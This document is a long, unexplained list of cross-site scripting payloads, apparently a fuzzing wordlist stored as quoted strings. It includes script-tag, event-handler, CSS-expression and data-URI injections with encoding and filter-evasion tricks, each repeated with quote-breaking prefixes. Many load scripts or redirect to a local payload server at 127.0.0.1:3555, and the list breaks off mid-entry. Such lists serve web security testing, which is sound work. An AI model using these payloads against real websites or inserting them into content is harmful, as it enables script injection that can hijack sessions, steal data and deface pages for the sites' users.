'"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>', "'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?", "'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>", '"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>', "'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?", '<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?', '"><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?', '\'><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?', '<img src=x onerror=window.open(\'http://127.0.0.1:3555/xss_serve_payloads/X.html"\');>', '"><img src=x onerror=window.open(\'http://127.0.0.1:3555/xss_serve_payloads/X.html"\');>', '\'><img src=x onerror=window.open(\'http://127.0.0.1:3555/xss_serve_payloads/X.html"\');>', '<table background=javascript:alert(1)></table>', '"><table background=javascript:alert(1)></table>', "'><table background=javascript:alert(1)></table>", '<object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf', '"><object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf', "'><object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf", '<applet code="javascript:confirm(1);">', '"><applet code="javascript:confirm(1);">', '\'><applet code="javascript:confirm(1);">', '<marquee/onstart=confirm(2)>/', '"><marquee/onstart=confirm(2)>/', "'><marquee/onstart=confirm(2)>/", '<body onload=prompt(1);>', '"><body onload=prompt(1);>', "'><body onload=prompt(1);>", '<select autofocus onfocus=alert(1)>', '"><select autofocus onfocus=alert(1)>', "'><select autofocus onfocus=alert(1)>", '<textarea autofocus onfocus=alert(1)>', '"><textarea autofocus onfocus=alert(1)>', "'><textarea autofocus onfocus=alert(1)>", '<keygen autofocus onfocus=alert(1)>', '"><keygen autofocus onfocus=alert(1)>', "'><keygen autofocus onfocus=alert(1)>", '<video><source onerror="javascript:alert(1)">', '"><video><source onerror="javascript:alert(1)">', '\'><video><source onerror="javascript:alert(1)">', '<a onmouseover="javascript:window.onerror=alert;throw 1>', '"><a onmouseover="javascript:window.onerror=alert;throw 1>', '\'><a onmouseover="javascript:window.onerror=alert;throw 1>', '<img src=x onerror="javascript:window.onerror=alert;throw 1">', '"><img src=x onerror="javascript:window.onerror=alert;throw 1">', '\'><img src=x onerror="javascript:window.onerror=alert;throw 1">', "<body/onload=javascript:window.onerror=eval;throw'=alert\\x281\\x29';", '"><body/onload=javascript:window.onerror=eval;throw\'=alert\\x281\\x29\';', "'><body/onload=javascript:window.onerror=eval;throw'=alert\\x281\\x29';", '<img style="xss:expression(alert(1))">', '"><img style="xss:expression(alert(1))">', '\'><img style="xss:expression(alert(1))">', '<div style="color:rgb(\'\'&#0;x:expression(alert(1))"></div>', '"><div style="color:rgb(\'\'&#0;x:expression(alert(1))"></div>', '\'><div style="color:rgb(\'\'&#0;x:expression(alert(1))"></div>', '<a onmouseover=location=?javascript:alert(1)>click', '"><a onmouseover=location=?javascript:alert(1)>click', "'><a onmouseover=location=?javascript:alert(1)>click", '<body onfocus="location=\'javascrpt:alert(1) >123', '"><body onfocus="location=\'javascrpt:alert(1) >123', '\'><body onfocus="location=\'javascrpt:alert(1) >123', '<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>', '"><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>', '\'><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>', '<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>', '"><svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>', '\'><svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>', '<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>', '"><meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>', '\'><meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>', '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg>', '"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg>', '\'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg>', '<style>#test{x:expression(alert(/X/))}</style>', '"><style>#test{x:expression(alert(/X/))}</style>', "'><style>#test{x:expression(alert(/X/))}</style>", '<object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>', '"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>', "'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?", '"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?', "'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?", '<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">', '"><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">', '\'><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">', 'eval("s=document.createElement(\'script\');alert(1);document.getElementsByTagName(\'head\')[0].appendChild(s)")', '<meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '\'><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '<meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '\'><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '\'><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', 'javascript:/*?></marquee></script></title></textarea></noscript></style></xmp>?> [img=1]<img -/style=-=expression&#40/*?/-/*\',/**/eval(name)//);wi dth:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript :eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>?"/>', '<img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>', '"><img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>', "'><img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>", '<input id=x><input id=x><script>alert(x)</script>', '"><input id=x><input id=x><script>alert(x)</script>', "'><input id=x><input id=x><script>alert(x)</script>", '<a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>', '"><a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>', '\'><a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>', '<script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', '</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', '"><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', '</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', "'><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>", '</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', '<a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>', '"><a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>', "'><a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>", '<a href="123" id=x>test</a><script>x=\'javascript:alert(1)\';</script>', '"><a href="123" id=x>test</a><script>x=\'javascript:alert(1)\';</script>', '\'><a href="123" id=x>test</a><script>x=\'javascript:alert(1)\';</script>', '<form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '"><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '\'><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '"><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '\'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '<form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '"><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '\'><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '%3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E', '%3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E', "<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\\x3B'>X", '"><a/onmouseover[\\x0b]=location=\'\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\\x3B\'>X', "'><a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\\x3B'>X", 'data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E', 'window.name//\'name="javascript:alert("X")', '<svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()', '"><svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()', "'><svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()", '<%div%20style=xss:expression(prompt(1))>', '"><%div%20style=xss:expression(prompt(1))>', "'><%div%20style=xss:expression(prompt(1))>", '%22]);}catch(e){}if(!self.a)self.a=!alert(1);/', '<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>;', '</ScrIpt><script>alert(1)</script>;', '"><script>alert(1)</script>;', '</ScrIpt><script>alert(1)</script>;', "'><script>alert(1)</script>;", '</ScrIpt><script>alert(1)</script>;', '<script>alert("/X"/)</script>', '</ScrIpt><script>alert("/X"/)</script>', '"><script>alert("/X"/)</script>', '</ScrIpt><script>alert("/X"/)</script>', '\'><script>alert("/X"/)</script>', '</ScrIpt><script>alert("/X"/)</script>', '<SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/\\nalert(1);</SCRIPT>', '<script>alert([!![]]+[])</script>', '</ScrIpt><script>alert([!![]]+[])</script>', '"><script>alert([!![]]+[])</script>', '</ScrIpt><script>alert([!![]]+[])</script>', "'><script>alert([!![]]+[])</script>", '</ScrIpt><script>alert([!![]]+[])</script>', '<script>prompt(-[])</script>', '</ScrIpt><script>prompt(-[])</script>', '"><script>prompt(-[])</script>', '</ScrIpt><script>prompt(-[])</script>', "'><script>prompt(-[])</script>", '</ScrIpt><script>prompt(-[])</script>', '<scr/**/ipt>alert(1)</sc/**/ipt>', '"><scr/**/ipt>alert(1)</sc/**/ipt>', "'><scr/**/ipt>alert(1)</sc/**/ipt>", '#<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', "\\'><script>X<\\/script>", "\\'><body onload=\\'X\\'>", '><script>X<\\/script>', '<body onload="X">', '"><body onload="X">', '\'><body onload="X">', '<img src="x:X" onerror="alert(1)">', '"><img src="x:X" onerror="alert(1)">', '\'><img src="x:X" onerror="alert(1)">', '<img src=a onerror=alert(1)', '"><img src=a onerror=alert(1)', "'><img src=a onerror=alert(1)%0A>a", '"><img src=a onerror=alert(1)%0A>a', "'><img src=a onerror=alert(1)%0A>a", 'onmouseover=alert(1);', '<<SCRIPT>alert(1);/', '"><<SCRIPT>alert(1);/', "'><<SCRIPT>alert(1);/", '<SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/', 'alert(1)', 'alert(String.fromCharCode(49))', 'alert(/1/.source)', "eval('alert(1)')", "this['EvAL'.toLowerCase()]('aLErT(1)'.toLowerCase())", '(alert(1)).replace(/.+/,eval);', '\\u0061\\u006c\\u0065\\u0072\\u0074(1)', "eval('\\u00' + '6' + '1'+'le' + '\\u0072' + 't(1)')", "eval('\\141\\154\\145\\162\\164\\50\\61\\51')", "eval('\\x61\\x6c\\x65\\x72\\x74(1)')", "eval('\\x61ler\\x74(1)')", "top['a\\x6Cert'](1)", "x='\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29';new Function(x)()", "setTimeout('alert(1)',0)", 'setTimeout(\\u0061\\u006c\\u0065\\u0072\\u0074(1),0);', "onerror=eval;throw'alert\\x281\\x29';", 'expression(URL=0)', 'expr\\65 ssion(URL=0)', 'expr\\65 ss/*???*/ion(URL=0);', 'expression\\28URL=0\\29', 'expr\\65 ss/*\\&#x25;/ion\\28URL=0\\29', '\\000045xpr\\000065 ss/*BlABl/\\\\aaaaa!!!*', 'feed:javascript:alert(1)', 'feed:javascript&colon;alert(1)', 'feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e', 'feed:data:text/html,%3csvg%20onload=alert%281%29%3e', 'data:text/html,%3Cscript%3Ealert(1)%3C/script%3E', 'd&#x61;t&#x61;&colon;text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', 'data:_;;;:;base64_______,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', '<LAYER SRC="javascript:alert(1);"></LAYER>', '"><LAYER SRC="javascript:alert(1);"></LAYER>', '\'><LAYER SRC="javascript:alert(1);"></LAYER>', '<LINK REL="stylesheet" HREF="javascript:alert(1);">', '"><LINK REL="stylesheet" HREF="javascript:alert(1);">', '\'><LINK REL="stylesheet" HREF="javascript:alert(1);">', '<!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->', '"><!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->', "'><!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT><![endif]-->', '<BASE HREF="javascript:alert(1);//">', '"><BASE HREF="javascript:alert(1);//">', '\'><BASE HREF="javascript:alert(1);//">', 'data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', '<script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '<IFRAME SRC="javascript:alert(1);"></IFRAME>', '"><IFRAME SRC="javascript:alert(1);"></IFRAME>', '\'><IFRAME SRC="javascript:alert(1);"></IFRAME>', '<iframe src="javascript:alert(1); <', '"><iframe src="javascript:alert(1); <', '\'><iframe src="javascript:alert(1); <', '<object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>', '"><object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>', '\'><object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>', '<SCRIPT>x=/X/ alert(x.source)</SCRIPT>', '</ScrIpt><SCRIPT>x=/X/ alert(x.source)</SCRIPT>', '"><SCRIPT>x=/X/ alert(x.source)</SCRIPT>', '</ScrIpt><SCRIPT>x=/X/ alert(x.source)</SCRIPT>', "'><SCRIPT>x=/X/ alert(x.source)</SCRIPT>", '</ScrIpt><SCRIPT>x=/X/ alert(x.source)</SCRIPT>', '<BODY ONLOAD=alert(1)>', '"><BODY ONLOAD=alert(1)>', "'><BODY ONLOAD=alert(1)>", '<ScRiPt+>prompt(1)</ScRiPt>', '"><ScRiPt+>prompt(1)</ScRiPt>', "'><ScRiPt+>prompt(1)</ScRiPt>", '<img src=X onerror=alert(1)>', '"><img src=X onerror=alert(1)>', "'><img src=X onerror=alert(1)>", '<img src=/ onerror=alert(1);>', '"><img src=/ onerror=alert(1);>', "'><img src=/ onerror=alert(1);>", '<BODY BACKGROUND="javascript:alert(1)">', '"><BODY BACKGROUND="javascript:alert(1)">', '\'><BODY BACKGROUND="javascript:alert(1)">', '<TABLE BACKGROUND="javascript:alert(1)">', '"><TABLE BACKGROUND="javascript:alert(1)">', '\'><TABLE BACKGROUND="javascript:alert(1)">', "<IMG SRC='vbscript:msgbox(1)'>", '"><IMG SRC=\'vbscript:msgbox(1)\'>', "'><IMG SRC='vbscript:msgbox(1)'>", '<ScriPt>ALeRt(? X ?)</scriPt>', '</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>', '"><ScriPt>ALeRt(? X ?)</scriPt>', '</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>', "'><ScriPt>ALeRt(? X ?)</scriPt>", '</ScrIpt><ScriPt>ALeRt(? X ?)</scriPt>', '<a href="javascript#alert(1);">', '"><a href="javascript#alert(1);">', '\'><a href="javascript#alert(1);">', '<div onmouseover="alert(1);">', '"><div onmouseover="alert(1);">', '\'><div onmouseover="alert(1);">', '<BR SIZE="&{alert(1)}">', '"><BR SIZE="&{alert(1)}">', '\'><BR SIZE="&{alert(1)}">', '&<script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>', '&{alert(1);};', '<img src=&{alert(1);};>', '"><img src=&{alert(1);};>', "'><img src=&{alert(1);};>", '<img src="mocha:alert(1);">', '"><img src="mocha:alert(1);">', '\'><img src="mocha:alert(1);">', '<img src="livescript:alert(1);">', '"><img src="livescript:alert(1);">', '\'><img src="livescript:alert(1);">', '<a href="about:<script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>">', '[\\xC0][\\xBC]script>alert(1);[\\xC0][\\xBC]/script>" };', '<object classid="clsid:..." codebase="javascript:alert(1);">', '"><object classid="clsid:..." codebase="javascript:alert(1);">', '\'><object classid="clsid:..." codebase="javascript:alert(1);">', '<style><!--</style><script>alert(1);//--></script>', '"><style><!--</style><script>alert(1);//--></script>', "'><style><!--</style><script>alert(1);//--></script>", '<![CDATA[<!--]]<script>alert(1);//--></script>', '"><![CDATA[<!--]]<script>alert(1);//--></script>', "'><![CDATA[<!--]]<script>alert(1);//--></script>", '<!-- -- --><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script><!-- -- -->', 'javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42\'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"', '<EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>', '"><EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>', '\'><EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>', '<img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>', '"><img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>', '\'><img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>', '<img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>', '"><img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>', '\'><img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>', '<img src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>', '"><img src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>', '\'><img src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>', '<img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>', '"><img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>', '\'><img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>', '<meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '"><meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '\'><meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<BGSOUND SRC="javascript:alert(1);">', '"><BGSOUND SRC="javascript:alert(1);">', '\'><BGSOUND SRC="javascript:alert(1);">', '<script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>', '"><script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>', '\'><script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>', '<SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT a=">" \'\' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT "a=\'>\'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT a=">\'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT 